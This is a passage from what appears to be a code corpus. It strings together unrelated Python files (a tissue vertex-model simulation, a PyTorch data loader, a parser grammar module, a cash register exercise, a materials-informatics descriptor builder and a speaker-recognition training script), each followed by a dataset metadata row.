if (neighbor < 1000) and (neighbor not in belt) and (node not in centers) and (neighbor not in centers) and ([min(node, neighbor), max(node, neighbor)] not in blacklist):
a = pos[node]
b = pos[neighbor]
c = pos[node+1000]
d = pos[neighbor+1000]
dist = distance.euclidean(a,b)
if (dist < const.l_intercalation):
if (np.random.rand(1)[0] < 1.):
print("Intercalation event between nodes", node, "and", neighbor, "at t = ", t)
# collapse nodes to same position
# apical
avg_loc = (np.array(a) + np.array(b)) / 2.0
a = avg_loc
b = avg_loc
# basal
avg_loc = (np.array(c) + np.array(d)) / 2.0
c = avg_loc
d = avg_loc
# move nodes toward new center
# apical
cents = list(set(G.neighbors(node)) & set(G.neighbors(neighbor)))
mvmt = unit_vector(a,pos[cents[1]])
a = [a[0]+l_mvmt*mvmt[0], a[1]+l_mvmt*mvmt[1], a[2]+l_mvmt*mvmt[2]]
G.node[node]['pos'] = a
mvmt = unit_vector(b,pos[cents[0]])
b = [b[0]+l_mvmt*mvmt[0], b[1]+l_mvmt*mvmt[1], b[2]+l_mvmt*mvmt[2]]
G.node[neighbor]['pos'] = b
# basal
#cents = list(set(G.neighbors(node+1000)) & set(G.neighbors(neighbor+1000)))
mvmt = unit_vector(c,pos[cents[1]+1000])
c = [c[0]+l_mvmt*mvmt[0], c[1]+l_mvmt*mvmt[1], c[2]+l_mvmt*mvmt[2]]
G.node[node+1000]['pos'] = c
mvmt = unit_vector(d,pos[cents[0]+1000])
d = [d[0]+l_mvmt*mvmt[0], d[1]+l_mvmt*mvmt[1], d[2]+l_mvmt*mvmt[2]]
G.node[neighbor+1000]['pos'] = d
ii = list((set(list(G.neighbors(node))) & set(list(centers))) - (set(list(G.neighbors(node))) & set(list(G.neighbors(neighbor)))))[0]
jj = list((set(list(G.neighbors(neighbor))) & set(list(centers))) - (set(list(G.neighbors(node))) & set(list(G.neighbors(neighbor)))))[0]
temp1 = list(set(G.neighbors(node)) & set(G.neighbors(cents[0])))
temp1.remove(neighbor)
temp2 = list(set(G.neighbors(neighbor)) & set(G.neighbors(cents[1])))
temp2.remove(node)
# sever connections
# apical
G.remove_edge(node,cents[0])
G.remove_edge(node,temp1[0])
G.remove_edge(neighbor,cents[1])
G.remove_edge(neighbor,temp2[0])
# basal
G.remove_edge(node+1000,cents[0]+1000)
G.remove_edge(node+1000,temp1[0]+1000)
G.remove_edge(neighbor+1000,cents[1]+1000)
G.remove_edge(neighbor+1000,temp2[0]+1000)
# add new connections
# apical
# new edges
G.add_edge(node,temp2[0],l_rest = const.l_apical, myosin=0,color='#808080')
G.add_edge(neighbor,temp1[0],l_rest = const.l_apical, myosin=0,color='#808080')
# new spokes
G.add_edge(neighbor,ii,l_rest = const.l_apical, myosin=0)
G.add_edge(node,jj,l_rest = const.l_apical, myosin=0)
# basal
# new edges
G.add_edge(node+1000,temp2[0]+1000,l_rest = const.l_apical, myosin=0,color='#808080')
G.add_edge(neighbor+1000,temp1[0]+1000,l_rest = const.l_apical, myosin=0,color='#808080')
# new spokes
G.add_edge(neighbor+1000,ii+1000,l_rest = const.l_apical, myosin=0)
G.add_edge(node+1000,jj+1000,l_rest = const.l_apical, myosin=0)
# reset myosin on contracted edge
G[node][neighbor]['myosin'] = 0
G[node+1000][neighbor+1000]['myosin'] = 0
blacklist.append([min(node, neighbor), max(node, neighbor)])
circum_sorted, triangles, K = new_topology(K,[node, neighbor], cents, temp1, temp2, ii, jj, belt, centers, num_api_nodes)
if min(node,neighbor) == 301:
contract[0] = False
# #set dt for next loop
# if var_dt == True:
# if any(contract) == True:
# # if any edges are still contracting, check for threshold length
# for i in range(0,num_inter):
# # calculate lengths of those that are still True
# if contract[i] == True:
# a = inter_edges[i][0]
# b = inter_edges[i][1]
# if distance.euclidean(pos[a],pos[b]) < 0.2:
# dt = 0.1
# break
# else:
# if isclose(t % 1, 0) == False:
# dt = 0.1
# else:
# dt = const.dt
# var_dt = False
# else:
# dt = const.dt
# Save nx Graph in pickled form for plotting later
if t % 1 == 0:
file_name = 't' + str(round(t))
nx.write_gpickle(G,file_name + '.pickle')
np.save(file_name,circum_sorted)
| main_orig.py | 17,117 | Constants for simulationvar_dt = True dimensions of the cell Set the arcs list mechanical parameters rest lengths of the passively elastic apical, basal and cell walls initialize the tissue Starting from t=0inter_edges = [[301,302],[295,296],[292,293],[298,299],[45,46],[39,40],[272,273],[174,175],[180,181],[276,277],[183,184],[177,178],[112,113],[286,287],[289,290],[115,116],[109,110],[283,284],[280,281],[106,107]] Starting from t=? after intercalations occurt = 1640 num_inter = 20 blacklist = [[301,302],[295,296],[292,293],[298,299],[45,46],[39,40],[272,273],[174,175],[180,181],[276,277],[183,184],[177,178],[112,113],[286,287],[289,290],[115,116],[109,110],[283,284],[280,281],[106,107]] contract = [False for counter in range(0,num_inter)]G = nx.read_gpickle('/home/cdurney/3d-vertex/concentric/t1640.pickle')for counter in range(0,num_inter): node = blacklist[counter][0] neighbor = blacklist[counter][1] print(node, neighbor) cents = list(set(K.neighbors(node)) & set(K.neighbors(neighbor))) ii = list((set(list(K.neighbors(node))) & set(list(centers))) - (set(list(K.neighbors(node))) & set(list(K.neighbors(neighbor)))))[0] jj = list((set(list(K.neighbors(neighbor))) & set(list(centers))) - (set(list(K.neighbors(node))) & set(list(K.neighbors(neighbor)))))[0] temp1 = list(set(K.neighbors(node)) & set(K.neighbors(cents[0]))) temp1.remove(neighbor) temp2 = list(set(K.neighbors(neighbor)) & set(K.neighbors(cents[1]))) temp2.remove(node) circum_sorted, triangles, K = new_topology(K,[node, neighbor], cents, temp1, temp2, ii, jj, belt, centers, num_api_nodes) t=initial nx Graph in pickled form for plotting later update myosin on outer arc update myosin on belt increment t by dt initialize force_dict back to zeros pre-calculate magnitude of pressure index of list corresponds to index of centers list eventually move to classes? 
get nodes for volume calculate volume calculate pressure Update myosin on a fictitious pit (no resemblance to SG geometry) if t < const.t_pit: myo = const.pit_strength*t for node in pit_centers: if node == 0: myo = 1.5*myo for neighbor in G.neighbors(node): G[node][neighbor]['myosin'] = myo if t > const.t_intercalate: if contract[0] == True: G[301][302]['myosin'] = const.belt_strength*(t-const.t_intercalate) update myosin on inner arc update force on each node Elastic forces due to the cytoskeleton Force due to myosin pressure for: apical nodes pressure for: basal nodes pressure for side panels loop through each cell loop through the 6 faces (or 5 or 7 after intercalation) on each face, calculate the center loop through the 4 triangles that make the face Implement bending energy Loop through all alpha, beta pairs of triangles Apical faces, calculate areas and cross-products don't double count the shared nodes Basal faces don't double count the shared nodes update location of node Check for intercalation events collapse nodes to same position apical basal move nodes toward new center apical basal cents = list(set(G.neighbors(node+1000)) & set(G.neighbors(neighbor+1000))) sever connections apical basal add new connections apical new edges new spokes basal new edges new spokes reset myosin on contracted edge set dt for next loop if var_dt == True: if any(contract) == True: if any edges are still contracting, check for threshold length for i in range(0,num_inter): calculate lengths of those that are still True if contract[i] == True: a = inter_edges[i][0] b = inter_edges[i][1] if distance.euclidean(pos[a],pos[b]) < 0.2: dt = 0.1 break else: if isclose(t % 1, 0) == False: dt = 0.1 else: dt = const.dt var_dt = False else: dt = const.dt Save nx Graph in pickled form for plotting later | 4,090 | en | 0.653646 |
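The force loop above leans on helpers imported from funcs_orig; as a reading aid, here is a hypothetical minimal sketch of the two simplest ones, inferred from how they are called (a linear spring law and a normalized direction vector); the real implementations in funcs_orig may differ:

import numpy as np

def unit_vector(a, b):
    # direction from point a toward point b, normalized to length 1
    v = np.asarray(b, dtype=float) - np.asarray(a, dtype=float)
    return v / np.linalg.norm(v)

def elastic_force(dist, l_rest, mu):
    # Hookean restoring magnitude for a passively elastic edge
    return mu * (dist - l_rest)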
from typing import Callable, Iterable
import torch
from torch.utils.data.dataloader import default_collate as default_collate_fn
from catalyst.data import ListDataset
def get_loader(
data_source: Iterable[dict],
open_fn: Callable,
dict_transform: Callable = None,
sampler=None,
collate_fn: Callable = default_collate_fn,
batch_size: int = 32,
num_workers: int = 4,
shuffle: bool = False,
drop_last: bool = False,
):
"""Creates a DataLoader from given source and its open/transform params.
Args:
        data_source (Iterable[dict]): an iterable containing your
data annotations,
(for example path to images, labels, bboxes, etc)
open_fn (Callable): function, that can open your
annotations dict and
transfer it to data, needed by your network
(for example open image by path, or tokenize read string)
dict_transform (callable): transforms to use on dict
(for example normalize image, add blur, crop/resize/etc)
sampler (Sampler, optional): defines the strategy to draw samples from
the dataset
collate_fn (callable, optional): merges a list of samples to form a
mini-batch of Tensor(s). Used when using batched loading from a
map-style dataset
batch_size (int, optional): how many samples per batch to load
num_workers (int, optional): how many subprocesses to use for data
loading. ``0`` means that the data will be loaded
in the main process
shuffle (bool, optional): set to ``True`` to have the data reshuffled
at every epoch (default: ``False``).
drop_last (bool, optional): set to ``True`` to drop
the last incomplete batch, if the dataset size is not divisible
by the batch size. If ``False`` and the size of dataset
is not divisible by the batch size, then the last batch
will be smaller. (default: ``False``)
Returns:
DataLoader with ``catalyst.data.ListDataset``
"""
dataset = ListDataset(
list_data=data_source, open_fn=open_fn, dict_transform=dict_transform,
)
loader = torch.utils.data.DataLoader(
dataset=dataset,
sampler=sampler,
collate_fn=collate_fn,
batch_size=batch_size,
num_workers=num_workers,
shuffle=shuffle,
pin_memory=torch.cuda.is_available(),
drop_last=drop_last,
)
return loader
__all__ = ["get_loader"]
| catalyst/dl/utils/torch.py | 2,550 | Creates a DataLoader from given source and its open/transform params.
Args:
    data_source (Iterable[dict]): an iterable containing your
data annotations,
(for example path to images, labels, bboxes, etc)
open_fn (Callable): function, that can open your
annotations dict and
transfer it to data, needed by your network
(for example open image by path, or tokenize read string)
dict_transform (callable): transforms to use on dict
(for example normalize image, add blur, crop/resize/etc)
sampler (Sampler, optional): defines the strategy to draw samples from
the dataset
collate_fn (callable, optional): merges a list of samples to form a
mini-batch of Tensor(s). Used when using batched loading from a
map-style dataset
batch_size (int, optional): how many samples per batch to load
num_workers (int, optional): how many subprocesses to use for data
loading. ``0`` means that the data will be loaded
in the main process
shuffle (bool, optional): set to ``True`` to have the data reshuffled
at every epoch (default: ``False``).
drop_last (bool, optional): set to ``True`` to drop
the last incomplete batch, if the dataset size is not divisible
by the batch size. If ``False`` and the size of dataset
is not divisible by the batch size, then the last batch
will be smaller. (default: ``False``)
Returns:
DataLoader with ``catalyst.data.ListDataset`` | 1,516 | en | 0.790807 |
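A short usage sketch of get_loader; the data rows and open_fn body are illustrative:

import numpy as np

rows = [{"features": np.random.rand(4).astype(np.float32), "label": i % 2} for i in range(16)]

def open_fn(row):
    # map one annotation dict onto the tensors the network expects
    return {"features": row["features"], "targets": row["label"]}

loader = get_loader(rows, open_fn=open_fn, batch_size=4, num_workers=0, shuffle=True)
for batch in loader:
    print(batch["features"].shape, batch["targets"])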
"""
This module contains functionality for extracting a grammar from
classes in a module.
"""
from __future__ import annotations
import types
from parsing.interfaces import SpecSource
from parsing.grammar import (
PrecedenceSpec,
PrecedenceRef,
TokenSpec,
NontermSpec,
)
from parsing.ast import Token, Nonterm, Precedence
from parsing import introspection
from parsing.errors import SpecError
class ModuleSpecSource(SpecSource):
"""
ModuleSpecSource scans one or several modules for subclasses of relevant
classes (Precedence, Token, Nonterm) with specific docstrings.
"""
def __init__(
self, modules: types.ModuleType | list[types.ModuleType]
) -> None:
if isinstance(modules, types.ModuleType):
# Wrap single module in a list.
modules = [modules]
self.modules = modules
items = []
for module in self.modules:
for k, v in module.__dict__.items():
if isinstance(v, type) and isinstance(v.__doc__, str):
dirtoks = introspection.parse_docstring(v.__doc__)
items.append((module, k, v, dirtoks))
self.named_objs = items
self._cache_precedences: list[PrecedenceSpec] | None = None
self._cache_tokens: list[TokenSpec] | None = None
self._cache_nonterminals: tuple[
list[NontermSpec], NontermSpec
] | None = None
def get_precedences(self) -> list[PrecedenceSpec]:
if self._cache_precedences is not None:
return self._cache_precedences
result = []
for module, k, v, dirtoks in self.named_objs:
if issubclass(v, Precedence) and dirtoks[0] in [
"%fail",
"%nonassoc",
"%left",
"%right",
"%split",
]:
name = k
relationships = {}
i = 1
while i < len(dirtoks):
tok = dirtoks[i]
m = PrecedenceSpec.assoc_tok_re.match(tok)
if m:
# Precedence relationship.
if m.group(2) in relationships:
raise SpecError(
"Duplicate precedence "
"relationship: %s" % v.__doc__
)
relationships[m.group(2)] = m.group(1)
else:
m = NontermSpec.token_re.match(tok)
if m:
if i != 1:
raise SpecError(
"Precedence name must come before "
"relationships: %s" % v.__doc__
)
name = m.group(1)
else:
raise SpecError(
"Invalid precedence specification: %s"
% v.__doc__
)
i += 1
prec = PrecedenceSpec(name, dirtoks[0][1:], relationships)
result.append(prec)
self._cache_precedences = result
return result
def get_tokens(self) -> list[TokenSpec]:
if self._cache_tokens is not None:
return self._cache_tokens
result = []
for module, k, v, dirtoks in self.named_objs:
if issubclass(v, Token) and dirtoks[0] in ["%token"]:
name = k
prec = None
i = 1
while i < len(dirtoks):
tok = dirtoks[i]
m = NontermSpec.precedence_tok_re.match(tok)
if m:
if i < len(dirtoks) - 1:
raise SpecError(
"Precedence must come last in token "
"specification: %s" % v.__doc__
)
prec = PrecedenceRef(m.group(1))
else:
m = NontermSpec.token_re.match(tok)
if m:
name = m.group(1)
else:
raise SpecError(
"Invalid token specification: %s" % v.__doc__
)
i += 1
if prec is None:
prec = PrecedenceRef("none")
token = TokenSpec(v, name, prec)
result.append(token)
self._cache_tokens = result
return result
def get_nonterminals(self) -> tuple[list[NontermSpec], NontermSpec]:
if self._cache_nonterminals is not None:
return self._cache_nonterminals
result = []
startSym: NontermSpec | None = None
for module, k, v, dirtoks in self.named_objs:
if issubclass(v, Nonterm) and dirtoks[0] in ["%start", "%nonterm"]:
nonterm, is_start = NontermSpec.from_class(v)
result.append(nonterm)
if is_start:
# Start symbol.
if startSym is not None:
raise SpecError(
"Only one start non-terminal allowed: %s"
% v.__doc__
)
startSym = nonterm
assert startSym is not None
self._cache_nonterminals = (result, startSym)
return result, startSym
| parsing/module_spec.py | 5,658 | ModuleSpecSource scans one or several modules for subclasses of relevant
classes (Precedence, Token, Nonterm) with specific docstrings.
This module contains functionality for extracting a grammar from
classes in a module.
Wrap single module in a list. Precedence relationship. Start symbol. | 292 | en | 0.667125 |
# cash register
class RetailItem:
def __init__(self, description, units_in_inventory, price):
self.__description = description
self.__units_in_inventory = units_in_inventory
self.__price = price
def get_description(self):
return self.__description
def get_units_in_inventory(self):
return self.__units_in_inventory
def get_price(self):
return self.__price
def set_description(self, description):
self.__description = description
def set_units_in_inventory(self, units_in_inventory):
self.__units_in_inventory = units_in_inventory
def set_price(self, price):
self.__price = price
def __str__(self):
return self.__description + ", " + \
"items: " + str(self.__units_in_inventory) + ", " + \
"$ " + str(float(self.__price)) + ". "
class CashRegister:
all_items_in_cart = []
def purchase_item(self, retail_item):
return self.all_items_in_cart.append(retail_item)
def get_total(self):
total = 0
for item in self.all_items_in_cart:
total += RetailItem.get_price(item) * \
RetailItem.get_units_in_inventory(item)
return total
def get_num_items(self):
num_items = 0
for item in self.all_items_in_cart:
num_items += RetailItem.get_units_in_inventory(item)
return num_items
def show_items(self):
if not self.all_items_in_cart:
print("Your Cart is empty.")
print("Your Cart:")
for item in self.all_items_in_cart:
print(item)
def clear(self):
self.all_items_in_cart.clear()
def main():
more = "y"
while more == "y":
# if you want to manually enter object parameters manually
# enter the instance attribute values
print("If you want to manually enter object parameters\n"
"manually enter the instance attribute values.")
print("Enter yours item.")
more_item = "y"
while more_item == "y":
description = input("description: ")
units_in_inventory = int(input("count of item: "))
price = float(input("price: "))
items = RetailItem(description, units_in_inventory, price)
CashRegister().purchase_item(items)
more_item = input("More item yes -'y', no -'any ch'.")
if more_item == "y":
continue
ready = input("Ready to pay? yes 'y', no 'any ch'")
if ready == "y":
print()
# show all item in basket
CashRegister().show_items()
# Showing the customer the number of selected products
print("Numbers of items:", CashRegister().get_num_items())
# returns the total cost of all RetailItem objects
# stored in the object's internal list 'all_items_in_cart'
print("Total = $",
'{:.2f}'.format(CashRegister().get_total()))
print()
print("Enter 'y' if you pay, no 'any ch'.")
print("Enter 'c' if you want clean cart.")
pay = input("Enter: ")
if pay == "y":
print("Paid.")
print("Product sent.")
# clears the internal list 'all_items_in_cart' of the
# CashRegister object. After payment, we clear the shopping
# cart, that is, the internal list 'all_items_in_cart'
print("Shopping cart empty.", CashRegister().clear())
break
if pay == "c":
# clears the internal list 'all_items_in_cart' of the
# CashRegister object. After payment, we clear the shopping
# cart, that is, the internal list 'all_items_in_cart'
print("we clear the shopping cart",
CashRegister().clear())
else:
print("The product remained in cart.")
more = input("Add more products? yes 'y', no 'any ch'")
main()
| chapter_10/08_cash_register.py | 4,219 | cash register if you want to manually enter object parameters manually enter the instance attribute values show all item in basket Showing the customer the number of selected products returns the total cost of all RetailItem objects stored in the object's internal list 'all_items_in_cart' clears the internal list 'all_items_in_cart' of the CashRegister object. After payment, we clear the shopping cart, that is, the internal list 'all_items_in_cart' clears the internal list 'all_items_in_cart' of the CashRegister object. After payment, we clear the shopping cart, that is, the internal list 'all_items_in_cart' | 615 | en | 0.718382 |
from itertools import chain
from typing import Iterator, Mapping, Union, List
from uuid import UUID
from gemd.entity.link_by_uid import LinkByUID
from gemd.entity.bounds import RealBounds, CategoricalBounds, MolecularStructureBounds, \
IntegerBounds, CompositionBounds
from gemd.entity.template.attribute_template import AttributeTemplate
from gemd.entity.template.has_property_templates import HasPropertyTemplates
from gemd.entity.template.has_condition_templates import HasConditionTemplates
from gemd.entity.template.has_parameter_templates import HasParameterTemplates
from gemd.entity.value import EmpiricalFormula
from gemd.util import recursive_flatmap, set_uuids
from citrine.builders.auto_configure import AutoConfigureMode
from citrine.informatics.descriptors import RealDescriptor, CategoricalDescriptor, \
MolecularStructureDescriptor, Descriptor, ChemicalFormulaDescriptor
from citrine.resources.data_concepts import DataConceptsCollection
from citrine.resources.material_run import MaterialRun
from citrine.resources.project import Project
class NoEquivalentDescriptorError(ValueError):
"""Error that is raised when the bounds in a template have no equivalent descriptor."""
pass
def template_to_descriptor(template: AttributeTemplate, *,
headers: List[str] = []) -> Descriptor:
"""
Convert a GEMD attribute template into an AI Engine Descriptor.
IntBounds cannot be converted because they have no matching descriptor type.
CompositionBounds can only be converted when every component is an element, in which case
they are converted to ChemicalFormulaDescriptors.
Parameters
----------
template: AttributeTemplate
Template to convert into a descriptor
headers: List[str]
Names of parent relationships to includes as prefixes
to the template name in the descriptor key
Default: []
Returns
-------
Descriptor
Descriptor with a key matching the template name and type corresponding to the bounds
"""
headers = headers + [template.name]
descriptor_key = '~'.join(headers)
bounds = template.bounds
if isinstance(bounds, RealBounds):
return RealDescriptor(
key=descriptor_key,
lower_bound=bounds.lower_bound,
upper_bound=bounds.upper_bound,
units=bounds.default_units
)
if isinstance(bounds, CategoricalBounds):
return CategoricalDescriptor(
key=descriptor_key,
categories=bounds.categories
)
if isinstance(bounds, MolecularStructureBounds):
return MolecularStructureDescriptor(
key=descriptor_key
)
if isinstance(bounds, CompositionBounds):
if set(bounds.components).issubset(EmpiricalFormula.all_elements()):
return ChemicalFormulaDescriptor(
key=descriptor_key
)
else:
msg = "Cannot create descriptor for CompositionBounds with non-atomic components"
raise NoEquivalentDescriptorError(msg)
if isinstance(bounds, IntegerBounds):
raise NoEquivalentDescriptorError("Cannot create a descriptor for integer-valued data")
raise ValueError("Template has unrecognized bounds: {}".format(type(bounds)))
class PlatformVocabulary(Mapping[str, Descriptor]):
"""
Dictionary of descriptors that define a controlled vocabulary for the AI Engine.
Parameters
----------
entries: Mapping[str, Descriptor]
Entries in the dictionary, indexed by a convenient name.
To build from templates, use PlatformVocabulary.from_templates
To build from a material, use PlatformVocabulary.from_material
"""
def __init__(self, *, entries: Mapping[str, Descriptor]):
self._entries = entries
def __getitem__(self, k: str) -> Descriptor:
return self._entries[k]
def __len__(self):
return len(self._entries)
def __iter__(self) -> Iterator[str]:
return iter(self._entries)
@staticmethod
def from_templates(*, project: Project, scope: str):
"""
Build a PlatformVocabulary from the templates visible to a project.
All of the templates with the given scope are downloaded and converted into descriptors.
The uid values associated with that scope are used as the index into the dictionary.
For example, using scope "my_templates" with a template with
uids={"my_templates": "density"} would be indexed into the dictionary as "density".
Parameters
----------
project: Project
Project on the Citrine Platform to read templates from
scope: str
Unique ID scope from which to pull the template names
Returns
-------
PlatformVocabulary
"""
def _from_collection(collection: DataConceptsCollection):
return {x.uids[scope]: x for x in collection.list() if scope in x.uids}
properties = _from_collection(project.property_templates)
parameters = _from_collection(project.parameter_templates)
conditions = _from_collection(project.condition_templates)
res = {}
for k, v in chain(properties.items(), parameters.items(), conditions.items()):
try:
desc = template_to_descriptor(v)
res[k] = desc
except NoEquivalentDescriptorError:
continue
return PlatformVocabulary(entries=res)
@staticmethod
def from_material(
*,
project: Project,
material: Union[str, UUID, LinkByUID, MaterialRun],
mode: AutoConfigureMode = AutoConfigureMode.PLAIN,
full_history: bool = True
):
"""[ALPHA] Build a PlatformVocabulary from templates appearing in a material history.
All of the attribute templates that appear throughout the material's history
are extracted and converted into descriptors.
Descriptor keys are formatted according to the option set by mode.
For example, if a condition template with name 'Condition 1'
appears in a parent process with name 'Parent',
the mode option produces the following descriptor key:
        mode = AutoConfigureMode.PLAIN --> 'Parent~Condition 1'
        mode = AutoConfigureMode.FORMULATION --> 'Condition 1'
Parameters
----------
project: Project
Project to use when accessing the Citrine Platform.
material: Union[str, UUID, LinkByUID, MaterialRun]
A representation of the material to extract descriptors from.
mode: AutoConfigureMode
Formatting option for descriptor keys in the platform vocabulary.
            Option AutoConfigureMode.PLAIN includes headers from the parent object,
            whereas option AutoConfigureMode.FORMULATION does not.
Default: AutoConfigureMode.PLAIN
full_history: bool
Whether to extract descriptors from the full material history,
or only the provided (terminal) material.
Default: True
Returns
-------
PlatformVocabulary
"""
if not isinstance(mode, AutoConfigureMode):
raise TypeError('mode must be an option from AutoConfigureMode')
        # The full history is not needed when full_history=False,
        # but it is convenient for populating templates on the terminal material
history = project.material_runs.get_history(id=material)
if full_history:
search_history = recursive_flatmap(history, lambda x: [x], unidirectional=False)
set_uuids(search_history, 'id')
else:
# Limit the search to contain the terminal material/process/measurements
search_history = [history.spec.template, history.process.template]
search_history.extend([msr.template for msr in history.measurements])
search_history = [x for x in search_history if x is not None] # Edge case safety
# Extract templates and formatted keys
res = {}
for obj in search_history:
# Extract all templates
templates = []
if isinstance(obj, HasPropertyTemplates):
                for prop in obj.properties:
                    templates.append(prop[0])
if isinstance(obj, HasConditionTemplates):
for condition in obj.conditions:
templates.append(condition[0])
if isinstance(obj, HasParameterTemplates):
for parameter in obj.parameters:
templates.append(parameter[0])
# Assemble to descriptors
headers = []
if mode == AutoConfigureMode.PLAIN:
headers.append(obj.name)
for tmpl in templates:
try:
desc = template_to_descriptor(tmpl, headers=headers)
res[desc.key] = desc
except NoEquivalentDescriptorError:
continue
return PlatformVocabulary(entries=res)
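# Usage sketch for from_material (the material identifier is an illustrative
# assumption):
#
#     vocab = PlatformVocabulary.from_material(project=project,
#                                              material='my_material_id',
#                                              mode=AutoConfigureMode.PLAIN)
#     for key, descriptor in vocab.items():
#         print(key, type(descriptor).__name__)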
| src/citrine/builders/descriptors.py | 9,152 | … | 3,134 | en | 0.697876 |
#!/usr/bin/env python
# encoding: utf-8
"""
@Author: yangwenhao
@Contact: 874681044@qq.com
@Software: PyCharm
@File: train_lores10_kaldi.py
@Time: 2020/4/4 11:14 AM
@Overview:
"""
from __future__ import print_function
import argparse
import os
import os.path as osp
import sys
import time
# Version conflict
import warnings
import numpy as np
import torch
import torch.backends.cudnn as cudnn
import torch.nn as nn
import torchvision.transforms as transforms
from kaldi_io import read_mat, read_vec_flt
from tensorboardX import SummaryWriter
from torch.autograd import Variable
from torch.optim.lr_scheduler import MultiStepLR, ExponentialLR
from tqdm import tqdm
from Define_Model.LossFunction import CenterLoss
from Define_Model.SoftmaxLoss import AngleSoftmaxLoss, AngleLinear, AdditiveMarginLinear, AMSoftmaxLoss
from Define_Model.model import PairwiseDistance
from Process_Data import constants as c
from Process_Data.KaldiDataset import ScriptTestDataset, KaldiExtractDataset, \
ScriptVerifyDataset
from Process_Data.LmdbDataset import EgsDataset
from Process_Data.audio_processing import concateinputfromMFB, to2tensor, varLengthFeat, ConcateVarInput
from Process_Data.audio_processing import toMFB, totensor, truncatedinput, read_audio
from TrainAndTest.common_func import create_optimizer, create_model, verification_test, verification_extract
from eval_metrics import evaluate_kaldi_eer, evaluate_kaldi_mindcf
from logger import NewLogger
warnings.filterwarnings("ignore")
import torch._utils
try:
torch._utils._rebuild_tensor_v2
except AttributeError:
def _rebuild_tensor_v2(storage, storage_offset, size, stride, requires_grad, backward_hooks):
tensor = torch._utils._rebuild_tensor(storage, storage_offset, size, stride)
tensor.requires_grad = requires_grad
tensor._backward_hooks = backward_hooks
return tensor
torch._utils._rebuild_tensor_v2 = _rebuild_tensor_v2
# Training settings
parser = argparse.ArgumentParser(description='PyTorch Speaker Recognition')
# Data options
parser.add_argument('--train-dir', type=str, help='path to dataset')
parser.add_argument('--valid-dir', type=str, help='path to dataset')
parser.add_argument('--test-dir', type=str, help='path to voxceleb1 test dataset')
parser.add_argument('--trials', type=str, default='trials', help='trials filename')
parser.add_argument('--domain', action='store_true', default=False, help='set domain in dataset')
parser.add_argument('--nj', default=12, type=int, metavar='NJOB', help='num of job')
parser.add_argument('--feat-format', type=str, default='kaldi', choices=['kaldi', 'npy'],
                    help='format of the feature files (default: kaldi)')
parser.add_argument('--check-path', default='Data/checkpoint/LoResNet10/spect/soft',
help='folder to output model checkpoints')
parser.add_argument('--save-init', action='store_true', default=True, help='save the initial model checkpoint')
parser.add_argument('--resume',
default='Data/checkpoint/LoResNet10/spect/soft/checkpoint_10.pth', type=str,
metavar='PATH',
help='path to latest checkpoint (default: none)')
parser.add_argument('--start-epoch', default=1, type=int, metavar='N',
help='manual epoch number (useful on restarts)')
parser.add_argument('--epochs', type=int, default=20, metavar='E',
                    help='number of epochs to train (default: 20)')
parser.add_argument('--scheduler', default='multi', type=str,
                    metavar='SCH', help='learning rate scheduler to use (default: multi)')
parser.add_argument('--gamma', default=0.75, type=float,
                    metavar='GAMMA', help='decay factor for the exponential scheduler (default: 0.75)')
parser.add_argument('--milestones', default='10,15', type=str,
                    metavar='MIL', help='epochs at which MultiStepLR decays the learning rate (default: 10,15)')
parser.add_argument('--min-softmax-epoch', type=int, default=40, metavar='MINEPOCH',
                    help='minimum epoch for initial parameter using softmax (default: 40)')
parser.add_argument('--veri-pairs', type=int, default=12800, metavar='VP',
                    help='number of verification pairs to evaluate (default: 12800)')
# Training options
# Model options
parser.add_argument('--model', type=str, help='model architecture to train')
parser.add_argument('--resnet-size', default=8, type=int,
                    metavar='RES', help='depth of the ResNet (default: 8)')
parser.add_argument('--inst-norm', action='store_true', default=False,
                    help='replace batchnorm with instance norm')
parser.add_argument('--channels', default='64,128,256', type=str,
                    metavar='CHA', help='channels of the conv layers (default: 64,128,256)')
parser.add_argument('--feat-dim', default=161, type=int, metavar='FEAT',
                    help='acoustic feature dimension')
parser.add_argument('--remove-vad', action='store_true', default=False,
                    help='remove the VAD component from the input features')
parser.add_argument('--alpha', default=12, type=float, metavar='FEAT',
                    help='scaling factor for embedding normalization (default: 12)')
parser.add_argument('--kernel-size', default='5,5', type=str, metavar='KE',
help='kernel size of conv filters')
parser.add_argument('--cos-sim', action='store_true', default=True,
                    help='use cosine similarity for verification scoring')
parser.add_argument('--avg-size', type=int, default=4, metavar='ES',
                    help='output size of the average pooling layer (default: 4)')
parser.add_argument('--embedding-size-a', type=int, default=128, metavar='ES',
help='Dimensionality of the embedding')
parser.add_argument('--embedding-size-b', type=int, default=64, metavar='ES',
help='Dimensionality of the embedding')
parser.add_argument('--embedding-size-o', type=int, default=32, metavar='ES',
help='Dimensionality of the embedding')
parser.add_argument('--batch-size', type=int, default=128, metavar='BS',
help='input batch size for training (default: 128)')
parser.add_argument('--input-per-spks', type=int, default=224, metavar='IPFT',
                    help='number of training samples per speaker (default: 224)')
parser.add_argument('--num-valid', type=int, default=5, metavar='IPFT',
                    help='number of validation samples per speaker (default: 5)')
parser.add_argument('--test-input-per-file', type=int, default=4, metavar='IPFT',
                    help='input samples per file for testing (default: 4)')
parser.add_argument('--test-batch-size', type=int, default=1, metavar='BST',
                    help='input batch size for testing (default: 1)')
parser.add_argument('--dropout-p', type=float, default=0., metavar='BST',
                    help='dropout probability (default: 0.0)')
# loss configure
parser.add_argument('--loss-type', type=str, default='soft', choices=['soft', 'asoft', 'center', 'amsoft'],
                    help='loss function for speaker classification (default: soft)')
parser.add_argument('--finetune', action='store_true', default=False,
                    help='fine-tune with a larger learning rate on the classifier')
parser.add_argument('--loss-ratio', type=float, default=0.1, metavar='LOSSRATIO',
                    help='weight of the center loss term (default: 0.1)')
parser.add_argument('--dom-ratio', type=float, default=0.1, metavar='DOMAINLOSSRATIO',
                    help='weight of the domain classification loss (default: 0.1)')
parser.add_argument('--sim-ratio', type=float, default=0.1, metavar='DOMAINLOSSRATIO',
                    help='weight of the speaker-domain similarity loss (default: 0.1)')
# args for additive margin-softmax
parser.add_argument('--margin', type=float, default=0.3, metavar='MARGIN',
                    help='margin for the additive margin softmax loss (default: 0.3)')
parser.add_argument('--s', type=float, default=15, metavar='S',
                    help='scale for the additive margin softmax loss (default: 15)')
# args for a-softmax
parser.add_argument('--m', type=int, default=3, metavar='M',
                    help='margin for the angular softmax loss (default: 3)')
parser.add_argument('--lambda-min', type=int, default=5, metavar='S',
                    help='minimum lambda for angular softmax annealing (default: 5)')
parser.add_argument('--lambda-max', type=float, default=1000, metavar='S',
                    help='maximum lambda for angular softmax annealing (default: 1000)')
parser.add_argument('--lr', type=float, default=0.1, metavar='LR', help='learning rate (default: 0.1)')
